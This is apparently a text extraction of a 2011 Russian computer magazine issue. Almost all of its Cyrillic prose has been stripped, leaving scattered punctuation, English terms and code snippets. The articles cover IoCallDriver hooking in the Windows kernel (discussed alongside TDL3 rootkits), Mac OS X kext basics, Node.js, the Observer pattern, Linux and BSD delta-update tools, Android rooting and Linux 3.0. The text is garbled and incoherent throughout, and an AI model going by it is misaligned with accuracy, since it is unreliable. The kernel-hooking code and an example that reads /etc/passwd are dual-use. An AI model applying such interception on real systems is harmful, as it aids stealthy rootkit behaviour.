, , .

?

, ,
?
?

?
, , ,
,

. , ,
, ,

,
.
,

, . ,
, -
.

, , ,
.
,

. z
,
,
.

, ,

.
,
(www.joineset.com).
,

.

, ?
,

Stuxnet Under the Microscope.

.

.

TDL3/3+/4,
,

.

?
,
097
(stannic.man@gmail.com)

IRP-
, ,
,
,
.

.
DVD

,
IoCallDriver, ,
!
INFO
, ,

/

TDL3 (4), ,
IoCallDriver,

.
: ,
, , ,
.
. , , .
, Microsoft
- (
MSDN: http://goo.gl/kPt8b, http://goo.gl/igD0b). ,
, TDI-,
.
NDIS-IM-,
. , ,
- .
, RKU, IoCallDriver
,
- ,
. . , Microsft WDM
: IoCreateDevice IoAttachDevice
, .
IRP-,
-, ,
, IRP-.
, , -
IRP-,
, .
, . ,
-, IoCallDriver.
, . , ,
major- ,
- IRP-.
NTSTATUS
FASTCALL
IopfCallDriver(
098
10 /153/ 2011
IN PDEVICE_OBJECT DeviceObject,
IN OUT PIRP Irp
)
{
Irp->CurrentLocation--;
irpSp = IoGetNextIrpStackLocation( Irp );
Irp->Tail.Overlay.CurrentStackLocation = irpSp;
irpSp->DeviceObject = DeviceObject;
driverObject = DeviceObject->DriverObject;
status = driverObject->MajorFunction[irpSp->MajorFunction](
DeviceObject, Irp );
return status;
}
, IoCallDriver
IofCallDriver, , ,
IopfCallDriver. ,
,
, ,
IoCallDriver. ! - , , major . , , IoCallDriver, ,

( , , ,
?), .
,
. IRP-,
IoCallDriver,
, . , MJ- IRP_MJ_CREATE

. - ,
IRP- , , ,
IRP-, ,
. , IoCallDriver
DeviceObject, ,
, IRP.
. IRP- IRP_MJ_
READ. IoCallDriver, IRP-,
MajorFunction IRP_MJ_READ. ,
? , , DeviceObject.
.
, ( ) ,
:
BOOLEAN IsKeybordDevice( DEVICE_OBJECT * topDevice )
{
UNICODE_STRING driverName = {0};
DEVICE_OBJECT * device = 0;
RtlInitUnicodeString( & driverName, L"\\Driver\\Kbdclass");
for (device = TopDevice;
device;
device = device->DeviceObjectExtension->AttachedTo)
{
if ( !RtlCompareUnicodeString(
&device->DriverObject->DriverName, &driverName, TRUE))
return TRUE;
}
return FALSE;
}
10 /153/ 2011
DeviceObject. ,
DRIVER_OBJECT. , IRP, , , IO_STACK_
LOCATION *stack = IoGetCurrentIrpStackLocation(pIrp).

- stack->FileObject.
,
IRP-, . , ,
- c .
!
IoCallDriver,
IRP- IRP_MJ_CREATE, stack->FileObject
:
OBJECT_NAME_INFORMATION *fileNameInformation = 0;
status = ObQueryNameString( stack->FileObject,
fileNameInformation, 1024, &retSize);
wcscat(fileNameInformation->Name.Buffer,
stack->FileObject->FileName.Buffer);
DbgPrint("file name now is: %ws \n", fileNameInformation->Name.Buffer);
... IRP-, , , , .
ULONG CreateDisposition =
(stack->Parameters.Create.Options>> 24)& 0x000000ff;
if((CreateDisposition==FILE_CREATE)||
(CreateDisposition==FILE_OPEN_IF )||
(CreateDisposition==FILE_OVERWRITE_IF))
{
Irp->IoStatus.Status = STATUS_ACCESS_DENIED;
Irp->IoStatus.Information = 0;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
ExFreePool(fileNameInformation);
return STATUS_ACCESS_DENIED;
}
IRP-,
IoCallDriver, . , IoCallDriver
Windows.
, IRP- -, IRP-. ,

FastIO, . ,
IRP- ,
, IoCallDriver
. / IoCallDriver
BSODa DRIVER_UNLOADED_WITHOUT_CANCELLING_
PENDING_OPERATIONS. ,
,
IRP-. :
, IoCallDriver, IRP-.
,
. , . ,

. ,
! z
099
(seva@vingrad.ru)
KERNEL- MAC OS X
Mac OS X
iOS .
,
? . .
BSD
Mach
XNU
100
NKE
I/O Kit
MAC OS X
, . Mac OS X XNU (XNU is not UNIX). XNU
, : Mach, BSD -
IO Kit.
Mach ,
80- . , , , , ,
.
, GNU/HURD, GNU
Linux, , . -, , Mac OS X ,
, :). ,
Mac OS X Mach :
, ,
. ,
, ,
.
Mach- XNU :
;
;
;
10 /153/ 2011
kext
;
-.
BSD Mac OS X FreeBSD :
;
POSIX API, BSD;
TCP/IP BSD-;
;
;
.
Mac OS X
- IO Kit. C++ . ,
, , , , RTTI.
IO Kit C++,
. ,
IO Kit , ,
.
, : , . GDB.
kext , .
kext-manager.
kext' /System/Library/Extensions.
kext' ( ) Mac OS X
XCode. IDE.
:
1. XCode :).
2. Generic Kernel
Extension, C,
IO Kit- C++.
3. SampleKext (, :)).

,
SampleKext.c. :
SampleKext_start SampleKext_stop. , / .
, kext'

Mac OS X
, kext' (
kernel extension). XNU,

. , IOKit
kext. Kext , Mac OS X, :
plist-, , ;
Mach-O-,
, ;
, ..
kext ,
kextload . . kext' .
, . ,
10 /153/ 2011
101
kext
callback'
/ . , SampleKext_start ,
kext'.
, / .
SampleKext.c
#include <sys/systm.h>
#include <mach/mach_types.h>
kern_return_t MyKext_start (kmod_info_t * ki, void * d)
{
printf("Kext loaded.\n");
return KERN_SUCCESS;
}
kern_return_t MyKext_stop (kmod_info_t * ki, void * d)
{
printf("Kext unloaded.\n");
return KERN_SUCCESS;
}
, SampleKext.kext, ,
plist-.
kext Info.plist XML-.
:
CFBundleIdentifier kext'. , com.apple.
driver.AppleUSBMergeNub.
CFBundleExecutable kext'.
IO Kit-.
CFBundleVersion .
OSBundleLibraries , kext.
IOKitPersonalities IO Kit,
kext. , .
,
, kext'
OSBundleLibraries. , ,
kextlibs. -xml, XML-,
plist-:
kextlibs -xml MyKext.kext
<key>OSBundleLibraries</key>
<dict>
<key>com.apple.kpi.libkern</key>
<string>9.2.2</string>
</dict>
kext .
Info.plist. kext , :
kext' .
/tmp :
sudo cp -R SampleKext.kext /tmp
:
sudo kextload /tmp/SampleKext.kext
/var/log/system.log
kext'a. kext, kextunload: sudo kextunload /
tmp/SampleKext.kext.

KEXT'

OSBUNDLELIBRARIES
102
OUTRO
Mac OS X. ,
, .

, , , .
kernel-! z
10 /153/ 2011
(kononencheg@gmail.com)
JavaScript

NODE.JS
,
JavaScript.

,
.
, JS !
104
LINKS
INFO
nodejs.org
,

.

Node.js.

.

publish/subscribe,

Redis. ,
.
10 /153/ 2011
JavaScript
NODE.JS

,
. Python Twisted
. Node.js .
, Node.js I/O JavaScript. ,
JavaScript-, ,
, ,
, HTTP- .
, c , web, :
var http = require('http');
http.createServer(function(request, response) {
response.writeHead(200, {'Content-Type': 'text/plain'});
response.end(', !');
}).listen(8080, '127.0.0.1');
console.log(' http://127.0.0.1:8080/');
:
% node __.js
http://127.0.0.1:8080/
, <html>
<head><title>... . ;) !
? !
. !
JavaScript- Node V8,
/ .
,
. , Node

, -, -. , , .
NODE
, ,
require. ( )
.
. ++ V8, JavaScript. JS- :
circle.js
exports.area = function (r) {
return Math.PI r r;
};
exports.circumference = function (r) {
return 2 Math.PI r;
};
exports.
,
(area circumference ). :
var circle = require('./circle.js');
console.log( ' 4 %d',
circle.area(4));
,
console,
stdout stderr. log() printf- (
JavaScript . . .)
stdout, error() stderr.
process,
.
,
:
process.stdout, process.stderr process.stdin /. write ,
concole.log console.error, stdin
. Node -,
. :
process.stdin.on('data', function (chunk) {
//
process.stdout.write('data: ' + chunk);
});
10 /153/ 2011
, ,
callback-. .
, , ,
.
process.argv , .
//
process.argv.forEach(function (val, index, array) {
console.log(index + ': ' + val);
});
105
process.cwd() .
process.pid, process.getgid() process.getuid() id , gid uid.
process.kill(pid, signal='SIGTERM') .
process.exit(num) . ,
,
:
process.on('exit', function () {
console.log(' ... ...');
});
,
, , Node.
, Node.js
. , , ,
, -! -
CGI-, , !
.

,

real-time web.
. ,
, ,
.
- !
--
, :
Soket.IO http://socket.io/
. . , , .
: - .
, . ,
, .
( !) Beseda,
,
(goo.gl/9SoJR). Bayeux
.
,
. , Soket.IO , -.

( 5000). Beseda 20 000 . -
.
!
,
. , .
Node.js JavaScript,
. .
io.js.
server.js index.html.
long-polling-, . ,
, .
,
Soket.IO ,
, ! -,
106
NODE
Node.js .
:
fs .
, .
fs.readFile('/etc/passwd', function (err, data) {

if (err) throw err;
console.log(data);
});
crypto : (sha1, md5, sha256, sha512 . .),
, , .
net TCP.
var net = require('net');
var server = net.createServer(function (c) {
c.write('hello\r\n');
c.pipe(c);
});
server.listen(8124, 'localhost');
dgram UDP- .
events .
util : , .
tls OpenSSL, SSL-
.
vm JavaScript-, . .
(eval ) js- .
var localVar = 123,
usingscript, evaled,
vm = require('vm');
usingscript = vm.runInThisContext('localVar = 1;',
'myfile.vm');
console.log('localVar: ' + localVar +
', usingscript: ' + usingscript);
// localVar: 123, usingscript: 1
dns (MX . .).
http, https web-.
child_process , , exec,
spawn . .
os , .
, , : MySQL
-.
JS-
NODE
V8
10 /153/ 2011
JavaScript
. , long-polling-, . .
,
,
, .
io.js :
//
var CHECK_INTERVAL = 1000;
//
//
var MAX_LOOP_COUNT = 10;
//
var connections = {};
//
var LongPollingData = function() {
this.loopCount = MAX_LOOP_COUNT;
this.dataQueue = [];
this.response = null;
};
//
function mainLoopIteration() {
var pollingData;
for (var id in connections) {
pollingData = connections[id];
if (pollingData.response) { //
pollingData.loopCount--;
10 /153/ 2011
// ...
if (pollingData.dataQueue.length
|| pollingData.loopCount === 0)
flush(pollingData); // ...
}
}
}
function flush(pollingData) {
pollingData.response.end(pollingData.dataQueue.join('|'));
pollingData.dataQueue = [];
pollingData.response = null;
}
setInterval(mainLoopIteration, CHECK_INTERVAL);
. , ,
, ,
. .
!
, .
var lastID = 0; //
//
var init = exports.init = function(request, response) {
var id = 'connection_' + ++lastID;
connections[id] = new LongPollingData();
response.end(id);
};
107

//
var hold = exports.hold = function(id, request, response) {
var pollingData = connections[id];
if (pollingData.response !== null)
flush(pollingData);
pollingData.response = response;
pollingData.loopCount = MAX_LOOP_COUNT;
};
//
var write = exports.write = function(id, data) {
var pollingData = connections[id];
pollingData.dataQueue.push(new Buffer(data.toString()));
}
//
var broadcast = exports.broadcast = function(data) {
for (var id in connections) write(id, data);
}
,
require:
var io = require('./mycoollibrary/io.js');
io.broadcast(' ');
WebSocket HTTP.
Flash Socket WebSoket
. -.
Long polling . ,
HTTP- ,
- ,
. jsonp-
. .
Multipart streaming . HTTP, .
Firefox.
Forever Iframe ,
. .

,
. server.js :
var http = require('http'),
fs = require('fs'),
io = require('./io.js'); // !
var server = http.createServer();
server.addListener('request', handleRequest);
server.listen(80, 'localhost');
function handleRequest(request, response) {
if (request.method === 'POST') {
io.init(request, response);
} else {
if (request.url === '/' || request.url === '/index.html') {
fs.readFile('./index.html', function (err, content) {
response.end(content);
});
} else {
io.hold(request.url.split('/').pop(), request, response);
}
}
}
// - !
setInterval(function() {
console.log(" !");
io.broadcast(" !");
}, 500);
POST- , GET- /_
.
500 .
, ,
.
. , , .
index.html (
jQuery):
108
<script>
var conectionID;
function connect() {
$.post("http://localhost/", function(data) {
conectionID = data;
poll();
});
}
function handleData(data) {
data = data.split('|');
while(data.length > 0)
$('body').append(data.shift() + '\n');
poll();
}
function poll() {
$.get("http://localhost/" + conectionID, handleData);
}
connect();
</script>

. , .
, ,
, .
, Node.js , , .
, ,
JavaScript, ! ,
... . z
10 /153/ 2011
/ TIPS&TRICKS
deeonis (deeonis@gmail.com)
.
,
-.
,
, ,
.
<<interface>>
Observable
+AddObserver(o: Observer)
+RemoveObserver(o: Observer)
+NotifyObserver()
ConcreteObservable
-observers: Observer[]
o..*
<<interface>>
Observer
+AddObserver(o: Observer)
+RemoveObserver(o: Observer)
+NotifyObserver()
HadleEvent()

10 /153/ 2011
, ,
. , , HDD,
. ,
, ring-3
.
, .

,
. . ,
, ,
.

SystemInfo,
.
, ,
SystemInfo . , .
SystemInfo
class SystemInfo()
{
...
float getCPUTemp();
float getGPUTemp();
int getHDDSpeed();
ConcreteObserer
+HadleEvent()
void notifyClients();
}
109
/ TIPS&TRICKS
getCPUTemp, getGPUTemp getHDDSpeed
. ,
. notifyClients, ,
,
.
- SystemInfo. ,
, , notifyClients
.

,
,
HDD. , notifyClients, ,
- . ,
, : cpuTemp, gpuTemp hddSpeed.
SystemInfo,
notifyClients, ,
:
notifyClients()
void SystemInfo()
{
float t_cpu = getCPUTemp();
float t_gpu = getGPUTemp();
int s_hdd = getHDDSpeed();
cpuTemp.update(t_cpu, t_gpu, s_hdd);
gpuTemp.update(t_cpu, t_gpu, s_hdd);
hddSpeed.update(t_cpu, t_gpu, s_hdd);
}
, , ? -,
. SystemInfo

. , , ,
,
, , ,
. -, ,
update(),
SystemInfo , . -, update() , .
.

,
.
,
, , ,
.
, .
.
, : , , . . Subject,
, , . . Observer. Subject
, , . Observer
.

, ,
.
Subject Observer.
110
Subject Observer
class Subject()
{
public:
void registerObserver(Observer &obs) = 0;
void removeObserver(Observer &obs) = 0;
protected:
void notifyObservers() = 0;
}
class Observer()
{
public:
void update(float t_cpu, float t_gpu, int s_hdd) = 0;
}
registerObserver() removeObserver() / .
notifyObservers() , update()
Observer .
: SystemInfo, CpuTemp, GpuTemp HddSpeed.

class SystemInfo() :
public Subject
{
public:
void registerObserver(Observer &obs)
{
// ,
//
}
void removeObserver(Observer &obs)
{
// ,
//
}
//...
protected:
void notifyObservers()
{
// , update()
// Observer
}
}
class CpuTemp() : public Observer
{
public:
// ...
void update(float t_cpu, float t_gpu, int s_hdd)
{
// , SystemInfo
}
}
// GpuTemp HddSpeed
// CpuTemp
registerObserver() removeObserver() , , ,
. , ,
-
10 /153/ 2011

struct SIData
{
float t_cpu;
float t_gpu;
int s_hdd;
}
class SystemInfo() : public Subject
{
public:
...
//
float getCpuTemp();
float getGpuTemp();
int getHddSpeed();
...
}
class Observer()
{
public:
void update(SIData *data = NULL) = 0;
}
PHP-
STL-. notifyObservers() ,
update().
, Observer,
SystemInfo, .
. , SystemInfo
, , Observer.
,
SystemInfo. ,
, . .

,
SystemInfo.
, GpuTemp
, HDD .

, update(),
. . . SystemInfo
, / SSD-,
Observer, ,
update() ,
. notifyObservers().
, , .

( ) . update() .

. ,
, ,
, . .
SystemInfo.
10 /153/ 2011
class CpuTemp() : public Observer

{
public:
// ...
void update(SIData *data)
{
if (data == NULL)
{
float t_cpu = sysInfo.getCpuTemp();
}
// , SystemInfo
}
}
// GpuTemp HddSpeed
// CpuTemp
, Observer,
, Subject.
, ,
- , . C++
,
. Observer,
Subject.
-
Subject.
,
, Observer
, Subject,
.
-, ,
, . , - . z
111
UNIXOID
(execbit.ru)
,

.

, ,
diff.
,

,

.
112
LINKS
goo.gl/MaO8l

Ksplice.
INFO
Debdelta
'--delta-algo',

.
: xdelta,
xdelta-bzip, xdelta3
bsdiff.
Makefile
binpatchng

,
,

OpenBSD (goo.
gl/FY7PX).

.
Ksplice ,
uptime 100 %,
xdelta bsdiff,
,
deltup, 95 %.
binpatchng,
OpenBSD .
KSPLICE
, Ksplice Oracle . ( , , ),
Linux ,
-
.
Ksplice ,
. .
,
Linux-
, diff-.
, ,
10 /153/ 2011
, ,
. - ,
.
ksplice.ko, -
. ksplice.ko
, , -.
, .
,
,
, ,
,
. Ksplice , 84 % bugfix-
, .
.
, 2009 ., Ksplice Inc.,
, Ksplice-.

. : Ksplice
Oracle,
-
Ubuntu Fedora, RHEL Unbreakable Linux. .
, . Ubuntu Fedora
ksplice.com , :
$ sudo apt-get install curl
$ sudo dpkg -i ksplice-uptrack.deb
.
. Install,
.
- ,
. .
XDELTA, BSDIFF
, Ksplice
, ,
. UNIX :
xdelta, rsync,
,
xdelta3 bsdiff,
BSD-.

diff, ,
.

, ,
, tar.gz- . ,
, , Wikipedia (ru.wikipedia.org/wiki/
-), ,
.
diff? :
,
.
,
, . -
10 /153/ 2011
OpenBSD 4.8
, ,
- ,
.
,
. -, . pacman ArchLinux
debdelta, Debian.
-, delta-,
.
, ,
, , (
). -, ,
. , ( )
( debdelta,
, ).
, :
ArchLinux .
xdelta:
$ sudo pacman -S xdelta3
/etc/pacman.conf,
UseDelta. /etc/pacman.d/
mirrorlist :
Server = http://delta.archlinux.fr/$repo/os/$arch
:
$ sudo pacman -Syu
, , .
, archlinux.fr , ,
, .
Debian .
( , ) debdelta,
deb- ,
xdelta
.
,
113
UNIXOID
deltup Gentoo , FreeBSD.
, deltup-. , ,
:
Gentoo . deltup getdelta:
$ sudo emerge deltup getdelta
/etc/make.conf :
$ sudo vi /etc/make.conf
FETCHCOMMAND="/usr/bin/getdelta.sh \"\${URI}\" -O
\"\${DISTDIR}/\${FILE}\""
emerge ,
getdelta .
/etc/deltup/getdelta.rc :
binpatch Makefile
apt-get.
, debdelta apt-get,
:
$ sudo apt-get update
$ sudo debdelta-upgrade
$ sudo apt-get upgrade
$ sudo vi /etc/deltup/getdelta.rc
# ( )
LOCAL_MIRROR=1.2.3.4
#
MAXIMUM_ACCEPTABLE_QUEUEPOS=10
#
REMOVE_OLD=yes
LOCAL_MIRROR ,
, Gentoo-, deltup-. MAXIMUM_
ACCEPTABLE_QUEUEPOS
. deltup-
,

( ).
debdelta :
$ sudo apt-get install debdelta
, BSD- xdelta bsdiff
(www.daemonology.net/bsdiff) .
freebsd-update
FreeBSD 2005 . ,
freebsd-update install, bsdiff ( ,
bspatch), . BSD-,
, bsdiff BSD.
DELTUP

, Gentoo. deltup
(deltup.sourceforge.net),
, ,
diff, ,

. , deltup-
,
,
. : deltup- 15 %
, 5 % ( deltup-: goo.gl/IetJU).
114
Ksplice
10 /153/ 2011
, inux01.gwdg.de
. - ,
, , . - deltup- ,
linux01.gwdg.de, getdelta
.
,
.
deltup FreeBSD.
deltup- Gentoo (-
).
FreeBSD deltup , :
1. deltup wget :
$
$
$
$
cd /usr/ports/sysutils/deltup
sudo make install clean
cd /usr/ports/ftp/wget
sudo make install clean

$ bsdiff _ _ _
$ bspatch _ _ _
$ xdelta3 -e -s _ _ _
$ xdelta3 -d -s _ _ _
$ deltup -mjb 9 _ _ _
$ deltup -p _
$ debdelta _ _ _
$ debpatch -A _ / _
10 /153/ 2011
2. /etc/make.conf :
$ sudo vi /etc/make.conf
FETCH_CMD=/usr/local/bin/getdelta.sh
, - portupgrade, deltup-.
, deltup
, ,
( gzip bzip2).
, NO_CHECKSUM:
$ cd /usr/ports/games/cowsay
$ make NO_CHECKSUM install clean
OPENBSD BINPATCH
, ,
, ,
OpenBSD.
,
OpenBSD, ,
.
, .
, , ,
, /
, .
, . OpenBSD
,
OpenBSD, ,
.
,
,
115
UNIXOID
Ksplice
, . ,
binpatch (openbsdbinpatch.sf.net), , ,
. binpatchng (binpatchng.puffy-at-work.org),

, OpenBSD-, ,
.
Binpatchng Makefile
. , Makefile , , make.

,
.
:
3.
( ftp://ftp.openbsd.org/pub/OpenBSD/4.9/i386/)
distfiles/_.
4. Makefile. www.openbsd.org/
errata.html, ( 4.9 ,
4.8), ( 001_
bgpd.patch), .
. Makefile. :
/usr/binpatchng-1.1/Makefile :
# vi /usr/binpatchng-1.1/Makefile
# ? ( ,
# .)
ARCH=i386
# ( patch)
PATCH_COMMON=001_bgpd
# 001_bgpd.patch
001_bgpd:
cd ${WRKSRC}/usr.sbin/bgpd
(${_obj}; ${_depend}; ${_build})
#
,
, .

. , :
cd usr.sbin/bgpd
make obj
make depend
make
make install
Makefile, . ,
Makefile.sample. :
#
#
#
#
cd /usr/binpatchng-1.1/
make PATCH="001" build
make PATCH="001" plist
make PATCH="001" package
patches,
:
# pkg_add binpatch-4.9-i386-001.tgz z
1. /usr
( ):
$ cd /tmp; wget http://goo.gl/hvF7O
$ su
# tar -xzf /tmp/binpatchng-1.1.tar.gz -C /usr
2. sys.tar.gz src.tar.gz FTP
distfiles, binpatchng:
#
#
#
#
#
cd /usr/binpatchng-1.1/
mkdir distfiles
cd distfiles
wget ftp://ftp.openbsd.org/pub/OpenBSD/4.9/sys.tar.gz
wget ftp://ftp.openbsd.org/pub/OpenBSD/4.9/src.tar.gz
116
Ksplice
10 /153/ 2011
UNIXOID
(execbit.ru)
MEGAFAQ
ANDROID OS
, , ,
- Android
,
,
,
,
.
.
FAQ
,
,
Android.
, , root
Android, ,
,
Android , , .
ANDROID
?
Android
.
,
Android :
1. . Android-
, . ,

,
. , ,
Java, .
2. . Android
Linux-

.

118
Android ( 5 )
(app_1, app_2, app_3 . .)

umask 0026
(u=rwx,g=rx,o=x).
, .
3. . Android-
, ,
,
.
-
.
, Android , ,
. Android
, ,
,

( Android ,
).
,

root,
, Linux,
, ,

, su

( , root-
T-Mobile G1,
telnet).
root (
su) ,
.
(Motorola, !)
NAND-,
,

root ( ,
).

.
,
, busybox,
, ,
root (,
), .
root ,
.
Rooting root

.
Android
10 /153/ 2011

,
Linux- root
.
SuperOneClick (goo.gl/HIbN),
, z4root (goo.gl/Bv7tx),
Android.

, 95 %
,
:
, , - ,

-- .
.
,
Android Google
.

, . ,
Android
CyanogenMod (www.cyanogenmod.com).
.
CYANOGENMOD
ANDROID?
CyangenMod , ,
,
Google, ,
, .

,
Google.
,

( / JIT,
, , ,
,

).
(,
),

SD-,
, T-Mobile,
,
, ,
FM- ( FM-),

(/ Wi-Fi,
Bluetooth, 3G . .).
busybox SSH-, . CyanogenMod
,

(www.cyanogenmod.com/devices).
,
CyanogenMod. xda-developers.com.
,

.
,
Windows.

,
,

(
).
, ,

( CyanogenMod),
. , (, ROM
Manager
SuperOneClick), SD-
zip- ,
,
Flash zip from sdcard, zip- .
Android ( )

NAND-,
Recovery ,
/

/,
,
(). Recovery
, ,

(

). ,

(, ) (Enter).

Recovery
.
, ( ),
(nandroid
backup) , Android,
swap,
/ .

, Android Market,
. Launcher,
Google, ,
, .
LauncherPro Zeam.
, Android Market ,
. -, Launcher7,
Windows Phone 7, , ,
. -, SlideScreen (
beta- : getsatisfaction.com/larvalabs),
(, SMS-, , , RSS-,
, Facebook . .) .
, - .
Simple Home, Windows Phone 7,
Spark, Android SlideScreen.
10 /153/ 2011
119
UNIXOID
CyanogenMod

CyanogenMod
CyanogenMod

ClockworkMod recovery,
Koushik Dutta (Koush).
lib Linux- (
), media
, bootanomation.zip ,
,
, audio
, . . (
Ogg Vorbis, ).
usr ,
Linux-
. build.prop .

,
:
.
:
Android ,
Linux-,
( ,
,

).
Android,
.
:
.
,
Android , ,
,
Android . ,
, ,
. , ,
,
,
(/ ,
), . :
:
$ wget http://a.b.c/update.zip
120
$ mkdir myrom
$ cd myrom
$ unzip ../update.zip

boot.img. META-INF
- ,
,
META-INF/com/google/android/
updater-script, , ,
Recovery .
boot.img Linux
ram-,
split_bootimg.pl (goo.gl/QejM9). ,
system
. ,
Android, . app,
( , , ), bin xbin Linux- ( xbin
busybox), etc
, fonts , framework Java-,
framework-res.apk
, ,
( xda-developers.com ),
$ zip -r myupdate.zip *
, Recovery
.
testsign.jar:
$ wget http://goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
myupdate.zip myupdate-sign.zip
SD-
Recovery.

SetCPU,
10 /153/ 2011
Android ( ): ADW.Launcher, Launcher7, Simple Home, SlideScreen
.

,
:
,
, . .
CyanogenMod:
CyanogenMod .
, SetCPU.
/
JIT-,
(
RAM)
VM heap,
(
)
( ).
root, Jitter VM Heap Tool.
TASK KILLER ?
Task Killer , .

,

. , Android,

10 /153/ 2011
, ,

.
,

, .
,
.

:

.
,

.
, ,

, . ,
,

. /sys/
module/lowmemorykiller/parameters,
,
lowmemorykiller:
echo "2560,4096,6144,12288,14336,18432" > /sys/
module/lowmemorykiller/parameters/minfree

/system/etc/init.d, ,
/system/etc/init.d ,
. ,
.

. Android
,
,
. , , , , Bluetooth, , ( Gmail,
), (,
).
, Startup Cleaner
( ).

ADB?
ADB Android Debug Bridge, Android-,

, , ,
,

.

(][_09_2011), . z
121
UNIXOID
Adept (adeptg@gmail.com)
3.0
?
Tux
Linux
LINUX KERNEL 3.0:

Linux 20-.
2.6.40 3.0. ,
, ,
2.6.
122
Linux
. - ( 2011.4.0),
. 2.6.40 3.0, (. .
3.0.1).
- , 40
. 40 ,
.
3.0
2.6.
:
Xen
.
Btrfs,
. : ext4
, OCFS2
TRIM (
SSD). CIFS Windows 2008 DFS ( ).

tcpdump.
64- .
Wake on WLAN. Wake on
LAN, .
/ ICMP-
root. SUID /bin/ping.
Cleancache, , ( ).
10 /153/ 2011
3.0
Intel
: Microsoft
Kinect, Intel (Ivy Bridge)
AMD Fusion.

rt- (Realtime) , Linux
. 2.6.33.

(374 690),
.
, , 3.0, 361
Microsoft.
Hyper-V. ,
Microsoft Linux.
Linux, Microsoft,
Microsoft Linux.
, IT-
. , , KVM (Kernel-based
Virtual Machine, Linux 2.6.20). ( )
Xen 3.0. ( ), KVM
CPU .
Linux ( )
, .
, KVM Xen, VMWare MS Hyper-V.
lguest. KVM
. Xen .
5000 . -
: .

, .
KSM (Kernel Samepage Merging),
10 /153/ 2011
. , .
, ,
.
Linux OpenVZ,
. LXC, : namespaces (
,
, .) Control Group
( ).

.
- (). 2.6
, :
SMP- 4096.
,
, 32 65 536.
.
, , mission critical,
, . , , CPU hotplug,
Linux 2.6.
, , -
(), , .
2.6 Big
Kernel Lock , Linux 2.0 SMP-,
. Receive Packet Steering
(RPS) Receive Flow Steering (RFS),
CPU.
, : Tile, 32- .
RAID. 2.6 :
123
UNIXOID
16 000 000
14 000 000
12 000 000
10 000 000
8 000 000
6 000 000
4 000 000
2 000 000
0
0.1
1.0
1.2
2.0
2.2
2.4
2.6
3.0
RAID6 (
).
RAID5 reshaping
.
RAID1 RAID5, RAID4 RAID5,
RAID5 RAID6 ( ).
. ,
- (,
, iSCSI AoE).
Oracle Cluster Filesystem (OCFS2)
Oracle.
Global File System (GFS2) , RedHat.
, , -.
( ), :
POHMELFS (Parallel Optimized Host Message Exchange Layered File
System) ( ,
, , ) NFS.
Ceph , (
) (
,
).
, 2.6 , DRBD,
( , RAID1).
:
exofs, OSD- (Object Storage Devices).
, ,
.
, , , .
libata NCQ hotplug.
124
InfiniBand,
RDS (Reliable Datagram Sockets),

. -500
90 % Linux.
desktop-
x86/amd64, .
, embedded-CPU-. 2.6
: UniCore, m68knommu, m32r, Fujitsu FR-V, Atmel AVR32,
MicroBlaze, S-core. 2.6 embedded linux:
,
Linux .
Execute-in-place .
ASoC (ALSA System on Chip)
ALSA SoC ( ).
UBI - LVM raw-flash- (
). LVM . Nokia
UBIFS, UBI-.
, Flash-, LogFS.
.
SPI SDIO (Secure Digital I/O)
MMC/SD- (GPS-,
Wi-Fi-, Bluetooth- Ethernet- ).
CAN (Controller Area Network). , ,
.
Linux Sony
PS3 (, ), Nintendo Wii Gamecube.
embedded-,
. Google Android Linux . Google, Android,
, ,
.

Linux PC , 2.6.0 12 %.
, Linux user.
, desktop-,
. 2.6
(, Linux ). :
3.0
3.0 ,
,
(, #ifdef LINUX2
).
,
Fedora 15 Linux 3.0 2.6.40,
.
10 /153/ 2011
3.0
GPU switching . , X Server

.
HDD 512 (
4 ).
PPTP L2TP. .
HDD . .
CFS (Completely Fair
Scheduler)
.
,
,
(tickless),
.
, Microsoft 20 Linux
, , Linux
. -
, - . 2.6
FUSE (Filesystem in Userspace). ,

( ), .
,
,
. :
SSHFS SFTP.
GmailFS Gmail.
WikipediaFS Wikipedia
( ).
, FUSE:
NTFS-3G NTFS Linux.
ZFS-Fuse ZFS (
- ).
menuconfig
USB
UVC (Universal Video Class)
gspca - (
230 -UVC-).
USB3.0 ACPI4.0 Linux ,
.
: Wireless USB, WiMAX (IEEE 802.16).
Nvidia Nouveau 3D-.
Kernel mode-setting (

, X Server)
. .
USB , VGA- USB-.
hibernation
/ .
10 /153/ 2011
FUSE CUSE,
( )
. ,
, , OSS Proxy,
OSS /dev/dsp, /dev/adsp /dev/mixer.

3.1 ,
, . :
Open-Source-CPU- OpenRISC.
Nintendo Wii
Wii Remote.
Intel (Sandy Bridge).
Nouveau
GeForce 400/500.
Intel GMA500.

Intel ,
-
, , , Intel GMA500 PowerVR SGX 535
Imagination Technologies.
125
UNIXOID
13,9%
24,7%
12,9%
0,9%
0,9%
0,9%
1,0%
1,1%
1,2%
1,3%
11,2%
1,6%
DCCP (Datagram Congestion Control Protocol, RFC 4340) .

, , ,
(VoIP, /, ).
IEEE 802.11s mesh-.
peer-to-peer- ,
. B.A.T.M.A.N. (Better Approach To
Mobile Adhoc Networking), mesh-.
,
. www.open-mesh.com.
2,0%
accel-pptp, PPTP/PPPoE/L2TP- PPTP-

.
CPU.
2,5%
2,6%
8,9%
4,1%
8,3%

RedHat
Novell
IBM
Intel
Linux Foundation
Consultant
SGI
MIPS Technologies
Oracle
MontaVista
Google
Linutronix
HP
NetApp
SWsoft

, :
Linux
:
ext4 ext3. , , 1 (260 ).
NILFS2 - ,

, .

.
Btrfs ZFS Sun ( Oracle)
(, ,
SSD ).
, . ( Fedora 17).
Squashfs read-only-
. , , LiveCD/USB.
Ecryptfs , .
, . . /,
.

: NTFS,
/ HFS+ HFSX ( Mac OS X), / UFS2
( BSD-).
FS-Cache, ,
, NFS, AFS CIFS.
.
2.6 IPv6 (netfilter, SELinux, ),

:
UDP-lite (RFC 3828) UDP-,

.
(VoIP, ) , .
126
(Mandatory Access
Control), , SELinux, :
AppArmor SELinux,
( 2.6.36). .
TOMOYO AppArmor, . AppArmor
,
. , /bin/bash,
sshd, , .
SMACK (Simplified Mandatory Access Control Kernel) SELinux (
), .
, , :
, USB-.
IMA (Integrity Management Architecture) , ,
.
Address space layout randomization (ASLR) ,
.
.
Per-process securebits
, .
VARIOUS
:

: make nconfig ( , menuconfig) make
localmodconfig (
).
( memtest,
memtest
) kgdb.
Fanotify
, inotify dnotify,

.
, read() write().
LatencyTop
. z
10 /153/ 2011
12 2200 .
6 1260 .
,
!
.
: 210

GOOGLE CHROME 030
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
LULZSEC / FOX NEWS
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
